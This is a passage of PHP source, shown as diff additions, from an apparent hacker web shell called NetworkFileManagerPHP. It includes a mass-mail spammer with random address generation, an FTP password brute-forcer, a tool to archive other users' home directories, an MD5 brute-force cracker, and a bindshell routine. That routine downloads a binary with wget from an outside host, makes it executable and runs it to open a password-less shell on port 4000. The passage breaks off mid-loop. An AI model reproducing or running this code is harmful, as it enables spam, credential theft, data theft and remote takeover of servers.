+   $ab4=count($word);
+   return $wq4=$word[mt_rand(0,$ab4-1)];
+}
+function u() {
+   $word=array('wu','su','du','qu','ru','tu','pu','fu','gu','hu','ju','ku','lu','zu','xu','cu','vu','bu','nu','mu');
+   $ab5=count($word);
+   return $wq5=$word[mt_rand(0,$ab5-1)];
+}
+
+function name0() {   return c().c().c().c();                    }
+function name1() {   return a().s();        }
+function name2() {   return o().s();        }
+function name3() {   return e().s();        }
+function name4() {   return i().s();        }
+function name5() {   return u().s();        }
+function name6() {   return a().s().g();        }
+function name7() {   return o().s().g();        }
+function name8() {   return e().s().g();        }
+function name9() {   return i().s().g();        }
+function name10() {   return u().s().g();        }
+function name11() {   return a().s().g().s();        }
+function name12() {   return o().s().g().s();        }
+function name13() {   return e().s().g().s();        }
+function name14() {   return i().s().g().s();        }
+function name15() {   return u().s().g().s();        }
+
+
+$cool=array(1,2,3,4,5,6,7,8,9,10,99,100,111,666,1978,1979,1980,1981,1982,1983,1984,1985,1986,1987,1988,1989,1990,1991,1992,1993,1994,1995,1996,1997,1998,1999,2000,2001,2002,2003,2004,2005);
+$domain1=array('mail.ru','hotmail.com','aol.com','yandex.ru','rambler.ru','bk.ru','pochta.ru','mail333.com','yahoo.com','lycos.com','eartlink.com');
+$d1c=count($domain1);
+
+function randword() {
+   global $cool,$cool2;
+   $func="name".mt_rand(0,15);
+   $func2="name".mt_rand(0,15);
+   switch (mt_rand(0,2)) {
+      case 0: return $func().$func2();
+      case 1: return $func().$cool[mt_rand(0,count($cool)-9)];
+	  case 2: return $func();
+      default: return $func();
+   }
+ }
+
+if (@unlink("email.txt") < 0){
+echo "?????";
+exit;
+}
+$file="email.txt";
+
+
+if($chislo){
+
+
+ $cnt3=mt_rand($chislo,$chislo);
+   for ($i=0; $i<$cnt3; $i++) {
+   $u=randword();
+  if(!isset($check_box)){
+
+  if ( IsSet($_POST["domen"]) && sizeof($_POST["domen"]) > 0 )
+{
+   $domen = $_POST["domen"];
+      foreach( $domen as $k=>$v )
+   {
+       $d=$domen[mt_rand(0,$v-1)];
+
+   }
+}
+$f=@fopen(email.".txt","a+");
+   fputs($f,"$u@$d\n");
+   }else{
+
+   $d=$domain1[mt_rand(0,$d1c-1)];
+   $f=@fopen(email.".txt","a+");
+   fputs($f,"$u@$d\n");
+   }
+
+  }
+   $address = $file;
+  if (@file_exists($address)) {
+    if($changefile = @fopen ($address, "r")) {
+      $success = 1;
+    } else  {
+    echo " File not found <b>\"".$address."\"</b> !<br>";
+  }
+
+   if ($success == 1) {
+   echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>";
+    echo "<tr><td align=center class=pagetitle width=500>  ?????????? ????? <b>$chislo</b> email.</td></tr>";
+	echo "<tr><td align=center> ";
+    echo "<textarea name=\"email\" rows=\"13\" cols=\"58\" class=inputbox>";
+    while($line = @fgets($changefile,1024)) {
+      echo @trim(stripslashes($line))."\n";
+    }
+    echo"</textarea></td></tr></table>";
+	}
+	}
+if (!isset($action)){
+ echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form action='$PHP_SELF?action=spam1&status=ok' method=post enctype='multipart/form-data'>
+ <tr><td align=center class=pagetitle colspan=2><b>Main spammer settings</b></font></b></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;reply to:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='from' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;send to:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='otvet' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Delay (sec):</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='wait' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;message topic:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='subject' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;message body:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<textarea name='body' rows='13' cols='60' class=inputbox> </textarea></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;File:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='file' name='file' size=30></td></tr>
+<tr><td width=500 align=center colspan=2>
+<input type='submit' value='Generate' class=button1 $style_button >
+<INPUT TYPE='hidden' NAME='$chislo'>
+</td></tr>
+ </form></table>";
+}
+}
+}
+
+function spam1() {
+ global $status, $from, $otvet, $wait, $subject, $body, $file, $chislo;
+ set_time_limit(0);
+ignore_user_abort(1);
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<tr><td align=center class=pagetitle><b>Send spam with current settings</b></font></b></td></tr>
+</table>";
+
+
+ error_reporting(63); if($from=="") { print
+"<script>history.back(-1);alert('missing field : <send from>')</script>";exit;}
+ error_reporting(63); if($otvet=="") { print
+"<script>history.back(-1);alert('missing field: <reply to>')</script>";exit;}
+ error_reporting(63); if($wait=="") { print
+"<script>history.back(-1);alert('missing field: <send delay>')</script>";exit;}
+ error_reporting(63); if($subject=="") { print
+"<script>history.back(-1);alert('missing field: <message topic>')</script>";exit;}
+ error_reporting(63); if($body=="") { print
+"<script>history.back(-1);alert('missing field: <message body>')</script>";exit;}
+
+  $address = "email.txt";
+  $counter = 0;
+ if (!isset($status)) echo "something goes wrong, check your settings";
+ else {
+ echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <tr><td align=center bgcolor=#FFFFCC>opening file <b>\"".$address."\"</b> ...<br></td></tr>
+";
+  if (@file_exists($address)) {
+ echo "
+  <tr><td align=center bgcolor=#FFFFCC>File <b>\"".$address."\"</b> was found...<br></td></tr>
+";
+    if($afile = @fopen ($address, "r")) {
+ echo "
+ <tr><td align=center bgcolor=#FFFFCC>File <b>\"".$address."\"</b> was opened for read...<br></td></tr>
+";
+    } else {
+ echo "
+ <tr><td align=center class=pagetitle>Unable to open  <b>\"".$address."\"</b> for read...<br></td></tr>
+";
+    }
+  } else {
+    echo "There is no file <b>\"".$address."\"</b> !<br>";
+    $status = "unable to find file \"".$address."\" ...";
+  }
+ echo "
+ <tr><td align=center bgcolor=#FFFFCC>Begining read from file <b>\"".$address."\"</b> ...<br></td></tr>
+ </table>";
+  if (@file_exists($address)) {
+
+    while (!feof($afile)) {
+
+      $line = fgets($afile, 1024);
+      $line = trim($line);
+      $recipient = "";
+      $recipient = $line;
+
+#if ($file) {
+#	$content = fread(fopen($file,"r"),filesize($file));
+#		$content = chunk_split(base64_encode($content));
+#		$name = basename($file);
+#   } else {
+#   $content ='';
+#   }
+      $boundary = uniqid("NextPart_");
+
+	  $header    = "From: ".$from."\r\n";
+	  $header   .= "Reply-To: ".$otvet."\r\n";
+	  $header   .= "Errors-To: ".$otvet."\r\n";
+      $header   .= "X-Mailer: MSOUTLOOK / ".phpversion()."\r\n";
+	  $header .= "Content-Transfer-Encoding: 8bits\n";
+      $header .= "Content-Type: text/html; charset=\"windows-1251\"\n\n";
+	  $header .= $body;
+	#  $header   .="--$boundary\nContent-type: text/html; charset=iso-8859-1\nContent-transfer-encoding: 8bit\n\n\n\n--$boundary\nContent-type: application/octet-stream; name=$file \nContent-disposition: inline; filename=$file \nContent-transfer-encoding: base64\n\n$content\n\n--$boundary--";
+
+
+	  $pattern="#^[-!\#$%&\"*+\\./\d=?A-Z^_|'a-z{|}~]+";
+      $pattern.="@";
+      $pattern.="[-!\#$%&\"*+\\/\d=?A-Z^_|'a-z{|}~]+\.";
+      $pattern.="[-!\#$%&\"*+\\./\d=?A-Z^_|'a-z{|}~]+$#";
+
+      if($recipient != "")
+      {
+        if(preg_match($pattern,$recipient))
+        {
+          echo "
+		  <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <tr><td align=center class=pagetitle>Sending mail to <b>\"".$recipient."\"</b>...sent ";
+
+
+            if(@mail($recipient, stripslashes($subject), stripslashes($header))) {
+              $counter = $counter + 1;
+              echo "<b>[\"".$counter."\"]</b> ".date("H:i:s")."</td></tr> </table>";
+            } else {
+              echo "<tr><td align=center class=pagetitle>email is wrong, message was NOT sent !</td></tr> </table>";
+            }
+          } else {
+              $counter = $counter + 1;
+              echo "";
+          }
+        } else {
+           echo "<br>";
+        }
+      $sec = $wait * 1000000;
+      usleep($sec);
+
+    }
+
+    if($otvet != "")
+    {
+
+      if(preg_match($pattern,$otvet))
+      {
+		echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+		  <tr><td align=center class=pagetitle>Sending test message to <b>\"".$otvet."\"</b> to check out";
+        $subject = "".$subject;
+
+        if(@mail($otvet, stripslashes($subject), stripslashes($message), stripslashes($header))) {
+          $counter = $counter + 1;
+          echo " message was sent... <b>[\"".$counter."\"]</b> ".date("H:i:s")."</td></tr> </table>";
+        } else {
+          echo "<tr><td align=center class=pagetitle>message was not sent...</td></tr> </table>";
+        }
+      } else {
+          echo "<tr><td align=center class=pagetitle>email is wrong.</td></tr> </table>";
+      }
+    } else {
+    }
+
+    if(@fclose ($afile)) {
+      echo "
+	   <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+  <tr><td align=center class=pagetitle>File <b>\"".$address."\"</b> was closed successfully!<br></td></tr> </table>";
+    } else {
+      echo "
+	   <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+  <tr><td align=center class=pagetitle>Unable to close  <b>\"".$address."\"</b> file!<br></td></tr> </table>";    }
+  } else {
+    echo "unable to read file  <b>\"".$afile."\"</b> ...<br>";
+  }
+
+     $status2 ="Status: ".$counter." messages were sent.";
+    echo "<br>";
+    echo "
+	  <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+  <tr><td align=center class=pagetitle>$status2</td></tr> </table>";
+
+}
+}
+
+
+# help
+
+function help() {
+
+ global $action,$REMOTE_ADDR,$HTTP_REFERER;
+
+ echo "<br>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>help for scriptNetworkFileManagerPHP</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br><b>NetworkFileManagerPHP</b> - script to access your host in a best way</font><br><br>
+
+There were added some commands to NFM, from scripts kind of itself. They are:<br>
+
+- Using aliases (<b>Rush</b>)<br>
+
+- FTP bruteforce (<b>TerraByte<b/>)<br>
+
+- Translated to english by (<b>revers<b/>)<br>
+
+- Added some sysinfo commands by (<b>revers<b/>)<br>
+
+- All the rest code belongs to me (<b>xoce<b/>)<br>
+
+- Thanks for testing goes to all #hack.ru channel<br><br>
+
+<b>Warning, we wanted to show by this script, that admins have to protect their system better, then they do now. Jokes with apache config are not good... Pay more attention to configuration of your system.</b><br><br>
+
+<b>How can you find us:</b><br>
+
+Irc server: irc.megik.net:6667 /join #hack.ru<br>
+
+See you round at network!!!<br></td></tr></table><br>";
+
+}
+
+
+
+
+
+function exploits($dir) {
+
+ global $action,$status, $file3,$file2,$tm,$PHP_SELF,$HTTP_HOST,$style_button, $public_site, $private_site, $private, $public, $title_ex, $title_exp;
+
+if (!isset($status)) upload_exploits();
+
+
+
+else
+
+{
+
+
+
+$data = implode("", file($file3));
+
+$fp = @fopen($file2, "wb");
+
+fputs($fp, $data);
+
+$ok = fclose($fp);
+
+if($ok)
+
+{
+
+$size = filesize($file2)/1024;
+
+$sizef = sprintf("%.2f", $size);
+
+print "".exec("chmod 777 $public[1]")."";
+
+print "".exec("chmod 777 $public[2]")."";
+
+print "".exec("chmod 777 $public[3]")."";
+
+print "".exec("chmod 777 $private[1]")."";
+
+print "".exec("chmod 777 $private[2]")."";
+
+print "".exec("chmod 777 $private[3]")."";
+
+print "".exec("chmod 777 $private[4]")."";
+
+print "".exec("chmod 777 $private[5]")."";
+
+print "".exec("chmod 777 $private[6]")."";
+
+print "".exec("chmod 777 $private[7]")."";
+
+print "".exec("chmod 777 $private[8]")."";
+
+
+
+print "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>You have uploaded: <b>file with size</b> (".$sizef."kb) </font></center></td></tr></table>";
+
+}
+
+else
+
+{
+
+print "Some errors occured.";
+
+}
+
+}
+
+}
+
+
+
+
+
+# FTP-bruteforce
+
+function ftp() {
+
+ global $action, $ftp_server, $filename, $HTTP_HOST;
+
+ ignore_user_abort(1);
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle>FTP server: <b>$ftp_server</b></td></tr>";
+
+
+
+ $fpip = @fopen ($filename, "r");
+
+ if ($fpip) {
+
+  while (!feof ($fpip)) {
+
+   $buf = fgets($fpip, 100);
+
+   ereg("^([0-9a-zA-Z]{1,})\:",$buf,$g);
+
+   $conn_id=ftp_connect($ftp_server);
+
+   if (($conn_id) && (@ftp_login($conn_id, $g[1], $g[1]))) {
+
+
+
+   $f=@fopen($HTTP_HOST,"a+");
+
+   fputs($f,"$g[1]:$g[1]\n");
+
+     echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Connected with login:password - ".$g[1].":".$g[1]."</b></td></tr></table>";
+
+
+
+   ftp_close($conn_id);
+
+   fclose($f);
+
+   } else {
+
+    echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#FFFFCC BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center>".$g[1].":".$g[1]." - <b>failed</b></td></tr></table>";
+
+   }
+
+  }
+
+ }
+
+}
+
+
+
+function tar() {
+
+ global $action, $filename;
+
+ set_time_limit(0);
+
+ echo "<br>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>Data compression</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br><blockquote>According to the different settings of servers, I didn't make default config of NFM. You're to write full path to the domain's folder and then press enter, so all data, containing in this folder will be compressed to tar.gz.<br><br>
+
+<b>Warning!</b><br>File <b>passwd</b> can have big size, so opening all users of this host can waste much time.<br><br>
+
+<b>It's highly recommended!</b><br>Open current function in another window of browser, to compress information, which you're interested in, during your host exploring.</blockquote></td></tr>
+
+</table><br>";
+
+
+
+$http_public="/public_html/";
+
+$fpip = @fopen ($filename, "r");
+
+if ($fpip) {
+
+ while (!feof ($fpip)) {
+
+  $buf = fgets($fpip, 100);
+
+  ereg("^([0-9a-zA-Z]{1,})\:",$buf,$g);
+
+  $name=$g[1];
+
+  echo "
+
+<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<form method='get' action='$PHP_SELF' >
+
+<tr><td align=center colspan=2 class=pagetitle><b>Compression <u>$name.tar.gz</u>:</b></td></tr>
+
+<tr>
+
+<td valign=top><input type=text name=cm size=90 class='inputbox'value='tar -zc /home/$name$http_public -f $name.tar.gz' ></td>
+
+<td valign=top><input type=submit value='GO' class=button1 $style_button></td>
+
+</tr></form></table>";
+
+  }
+
+ }
+
+}
+
+
+
+# bindshell
+
+function bash() {
+
+ global $action, $port_bind, $pass_key;
+
+
+
+echo "<br>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>Binding shell</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br>Current shell binds 4000 port, you may access to it by telneting to host:4000 port without password.</td></tr>
+
+</table><br>";
+
+
+
+echo "
+
+<TABLE CELLPADDING=0 CELLSPACING=0 width='500' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b> Bindshell binary is situated in file called<u><i>s</i></u></b></td></tr>";
+
+
+
+echo "<tr><td align=center bgcolor=#FFFFCC><b>&nbsp; ".exec("wget http://hackru.info/adm/exploits/bash/s")."</b> Downloading...</td></tr>";
+
+echo "<tr><td align=center bgcolor=#FFFFCC><b>&nbsp; ".exec("chmod 777 s")."</b> now chmod to 777</td></tr>";
+
+echo "<tr><td align=center bgcolor=#FFFFCC><b>&nbsp; ".exec("./s")."</b> now running to 4000 port</td></tr>";
+
+# echo "<tr><td align=center bgcolor=#FFFFCC><b>&nbsp; ".exec("rm -f s")."</b> Removing file<u>s</u> now...</td></tr>";
+
+echo"</table>";
+
+
+
+ }
+
+
+
+function crypte() {
+
+ global $action,$md5a,$sha1a,$crc32, $key,$string;
+
+echo "<br>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>Data crypter</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br><blockquote>Now there are many different programs and scripts, which uses a lot of passwords crypt methods (Do you remember what a phpBB is?=)), so with NFM you can crypt some strings to hashes, because sometimes you may need to change somebodyes data with your one =). Also you may change your pass to NFM here.</blockquote></td></tr>
+
+</table>";
+
+
+
+echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=crypte' method=post>
+
+ <tr><td align=left valign=top colspan=3 class=pagetitle>
+
+ &nbsp;&nbsp;<b>Here are some useful cryption methods, which uses MHASH lib:</b></td></tr>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>MD5 </b>(Very popular and fast method)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=400>&nbsp;Result:&nbsp;&nbsp;<font color=#ffffcc><b>".md5($md5a)."</b></font></td>
+
+ <td class=pagetitle width=100>&nbsp;Input:&nbsp;<font color=red><b>".$md5a."</b></font></td></tr>
+
+ <tr><td align=center width=400><input class='inputbox'type='text' name='md5a' size='50' value='' id='md5a'></td>
+
+ <td align=center width=100><input type='submit' value='Crypt MD5' class=button1 $style_button></td></tr>
+
+
+
+ </form></table>";
+
+ echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=crypte' method=post>
+
+ <tr> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>SHA1 </b>(SHA1 - method to crypt with open key, It's very usefull too)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=400>&nbsp;Result:&nbsp;&nbsp;<font color=#ffffcc><b>".sha1($sha1a)."</b></font></td>
+
+ <td class=pagetitle width=100>&nbsp;Input:&nbsp;<font color=red><b>".$sha1a."</b></font></td></tr>
+
+ <tr><td align=center width=400><input class='inputbox' type='text' name='sha1a' size='50' value='' id='sha1a'>
+
+ </td><td align=center width=100><input type='submit' value='Crypt SHA1' class=button1 $style_button></td></tr>
+
+
+
+ </form></table>";
+
+echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=crypte' method=post>
+
+ <tr> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC width=500>
+
+ &nbsp;&nbsp;<b>CRC32 </b>(Most used when making CRC check of data, but you can find a host with forum, with passwords, crypted by CRC32)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=400>&nbsp;Result:&nbsp;&nbsp;<font color=#ffffcc><b>".crc32($crc32)."</b></font></td>
+
+ <td class=pagetitle width=100>&nbsp;Input:&nbsp;<font color=red><b>".$crc32."</b></font></td></tr>
+
+ <tr><td align=center width=400><input class='inputbox' type='text' name='crc32' size='50' value='' id='crc32'></td><td width=100 align=center><input type='submit' value='Crypt CRC32' class=button1 $style_button></td></tr>
+
+
+
+ </form></table>";
+
+
+
+ }
+
+
+
+function decrypte() {
+
+ global $action,$pass_de,$chars_de,$dat,$date;
+
+set_time_limit(0);
+
+ignore_user_abort(1);
+
+
+
+echo "<br>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>Data decrypter</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br><blockquote>It's known all over the world, that MD5 crypt algorithm has no way to decrypt it, because it uses hashes. The one and only one way to try read what the hash is - to generate some hashes and then to compare them with source hash needed to be decrypted ... So this is bruteforce.</blockquote></td></tr>
+
+</table>";
+
+
+
+if($chars_de==""){$chars_de="";}
+
+ echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form action='$PHP_SELF?action=decrypte' method=post name=hackru><tr><td align=left valign=top colspan=3 class=pagetitle>
+
+ &nbsp;&nbsp;<b>Data decrypter:</b></td></tr>
+
+ <tr> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC width=500>
+
+ &nbsp;&nbsp;<b>Decrypt MD5</b>(decryption time depends on the length or crypted word, may take a long time)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=400 >&nbsp;MD5 hash:&nbsp;&nbsp;<font color=#ffffcc><b>".$pass_de."</b></font></td><td width=100 align=center>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=reset value=Clear class=button1 $style_button></td>
+
+  <tr><td align=left width=400 >&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<textarea  class='inputbox' name='chars_de' cols='50' rows='5'>".$chars_de."</textarea></td>
+
+  <td class=pagetitle width=120 valign=top><b>Symvols for bruteforce:</b><br><font color=red><b><u>ENG:</u></b></font>
+
+   <a class=menu href=javascript:ins('abcdefghijklmnopqrstuvwxyz')>[a-z]</a>
+
+<a class=menu href=javascript:ins('ABCDEFGHIJKLMNOPQRSTUVWXYZ')>[A-Z]</a>
+
+<a class=menu href=javascript:ins('0123456789')>[0-9]</a>
+
+<a class=menu href=javascript:ins('~`\!@#$%^&*()-_+=|/?&gt;<[]{}:?.,&quot;')>[Symvols]</a><br><br>
+
+<font color=red><b><u>RUS:</u></b></font>
+
+<a class=menu href=javascript:ins('?????????????????????????????????')>[?-?]</a>
+
+<a class=menu href=javascript:ins('?????????????????????????????????')>[?-?]</a>
+
+</td></tr>
+
+<tr><td align=center width=400>
+
+<input class='inputbox' type='text' name='pass_de' size=50 onclick=this.value=''></td><td width=100 align=center><input type='submit' value='Decrypt MD5' class=button1 $style_button>
+
+</td></tr>
+
+
+
+ </form></table>";
+
+
+
+
+
+if($_POST[pass_de]){
+
+$pass_de=htmlspecialchars($pass_de);
+
+$pass_de=stripslashes($pass_de);
+
+$dat=date("H:i:s");
+
+$date=date("d:m:Y");
+
+
+
+crack_md5();
+
+}
+
+}
+
+
+
+function crack_md5() {
+
+global $chars_de;
+
+$chars=$_POST[chars];
+
+set_time_limit(0);
+
+ignore_user_abort(1);
+
+$chars_de=str_replace("<",chr(60),$chars_de);
+
+$chars_de=str_replace(">",chr(62),$chars_de);
+
+$c=strlen($chars_de);
+
+for ($next = 0; $next <= 31; $next++) {
+
+for ($i1 = 0; $i1 <= $c; $i1++) {
+
+$word[1] = $chars_de{$i1};
+
+for ($i2 = 0; $i2 <= $c; $i2++) {
+
+$word[2] = $chars_de{$i2};
+
+if ($next <= 2) {
+
+result(implode($word));
+
+}else {
+
+for ($i3 = 0; $i3 <= $c; $i3++) {
+
+$word[3] = $chars_de{$i3};
+
+if ($next <= 3) {
+
+result(implode($word));
+
+}else {
+
+for ($i4 = 0; $i4 <= $c; $i4++) {
+
+$word[4] = $chars_de{$i4};
+
+if ($next <= 4) {
+
+result(implode($word));
+
+}else {
+
+for ($i5 = 0; $i5 <= $c; $i5++) {
+
+$word[5] = $chars_de{$i5};
+
+if ($next <= 5) {
+
+result(implode($word));
+
+}else {
+
+for ($i6 = 0; $i6 <= $c; $i6++) {
+
+$word[6] = $chars_de{$i6};
+
+if ($next <= 6) {
+
+result(implode($word));
+
+}else {
+
+for ($i7 = 0; $i7 <= $c; $i7++) {
+
+$word[7] = $chars_de{$i7};
+
+if ($next <= 7) {
+
+result(implode($word));
+
+}else {
+
+for ($i8 = 0; $i8 <= $c; $i8++) {
+
+$word[8] = $chars_de{$i8};
+
+if ($next <= 8) {
+
+result(implode($word));
+
+}else {
+
+for ($i9 = 0; $i9 <= $c; $i9++) {
+
+$word[9] = $chars_de{$i9};
+
+if ($next <= 9) {
+
+result(implode($word));
+
+}else {
+
+for ($i10 = 0; $i10 <= $c; $i10++) {
+
+$word[10] = $chars_de{$i10};
+
+if ($next <= 10) {
+
+result(implode($word));
+
+}else {
+
+for ($i11 = 0; $i11 <= $c; $i11++) {
+
+$word[11] = $chars_de{$i11};
+
+if ($next <= 11) {
+
+result(implode($word));
+
+}else {
+
+for ($i12 = 0; $i12 <= $c; $i12++) {
+
+$word[12] = $chars_de{$i12};
+
+if ($next <= 12) {
+
+result(implode($word));
+
+}else {
+
+for ($i13 = 0; $i13 <= $c; $i13++) {
+
+$word[13] = $chars_de{$i13};
+
+if ($next <= 13) {
+
+result(implode($word));
+
+}else {
+
+for ($i14 = 0; $i14 <= $c; $i14++) {
+
+$word[14] = $chars_de{$i14};
+
+if ($next <= 14) {
+
+result(implode($word));
+
+}else {
+
+for ($i15 = 0; $i15 <= $c; $i15++) {
+
+$word[15] = $chars_de{$i15};
+
+if ($next <= 15) {
+
+result(implode($word));
+
+}else {
+
+for ($i16 = 0; $i16 <= $c; $i16++) {
+
+$word[16] = $chars_de{$i16};
+
+if ($next <= 16) {
+
+result(implode($word));
+
+}else {
+
+for ($i17 = 0; $i17 <= $c; $i17++) {
+
+$word[17] = $chars_de{$i17};
+
+if ($next <= 17) {
+
+result(implode($word));
+
+}else {
+
+for ($i18 = 0; $i18 <= $c; $i18++) {
+
+$word[18] = $chars_de{$i18};
+
+if ($next <= 18) {
+
+result(implode($word));
+
+}else {
+
+for ($i19 = 0; $i19 <= $c; $i19++) {
+
+$word[19] = $chars_de{$i19};
+
+if ($next <= 19) {
+
+result(implode($word));
+
+}else {
+
+for ($i20 = 0; $i20 <= $c; $i20++) {
+
+$word[20] = $chars_de{$i20};
+
+if ($next <= 20) {
+
+result(implode($word));
+
+}else {
+
+for ($i21 = 0; $i21 <= $c; $i21++) {
+
+$word[21] = $chars_de{$i21};
+
+if ($next <= 21) {
+
+result(implode($word));
+
+}else {
+
+for ($i22 = 0; $i22 <= $c; $i22++) {
+
+$word[22] = $chars_de{$i22};
+
+if ($next <= 22) {
+
+result(implode($word));
+
+}else {
+
+for ($i23 = 0; $i23 <= $c; $i23++) {
+
+$word[23] = $chars_de{$i23};
+
+if ($next <= 23) {
+
+result(implode($word));
+
+}else {
+
+for ($i24 = 0; $i24 <= $c; $i24++) {
+
+$word[24] = $chars_de{$i24};
+
+if ($next <= 24) {
+
+result(implode($word));
+
+}else {
+
+for ($i25 = 0; $i25 <= $c; $i25++) {
+
+$word[25] = $chars_de{$i25};
+
+if ($next <= 25) {
+
+result(implode($word));
+
+}else {
+
+for ($i26 = 0; $i26 <= $c; $i26++) {
+
+$word[26] = $chars_de{$i26};
+
+if ($next <= 26) {
+
+result(implode($word));
+
+}else {
+
+for ($i27 = 0; $i27 <= $c; $i27++) {
+
+$word[27] = $chars_de{$i27};
+
+if ($next <= 27) {
+
+result(implode($word));
+
+}else {
+
+for ($i28 = 0; $i28 <= $c; $i28++) {
+
+$word[28] = $chars_de{$i28};
+
+if ($next <= 28) {
+
+result(implode($word));
+
+}else {
+
+for ($i29 = 0; $i29 <= $c; $i29++) {
+
+$word[29] = $chars_de{$i29};
+
+if ($next <= 29) {
+
+result(implode($word));
+
+}else {
+
+for ($i30 = 0; $i30 <= $c; $i30++) {
+
+$word[30] = $chars_de{$i30};
+
+if ($next <= 30) {
+
+result(implode($word));
+
+}else {
+
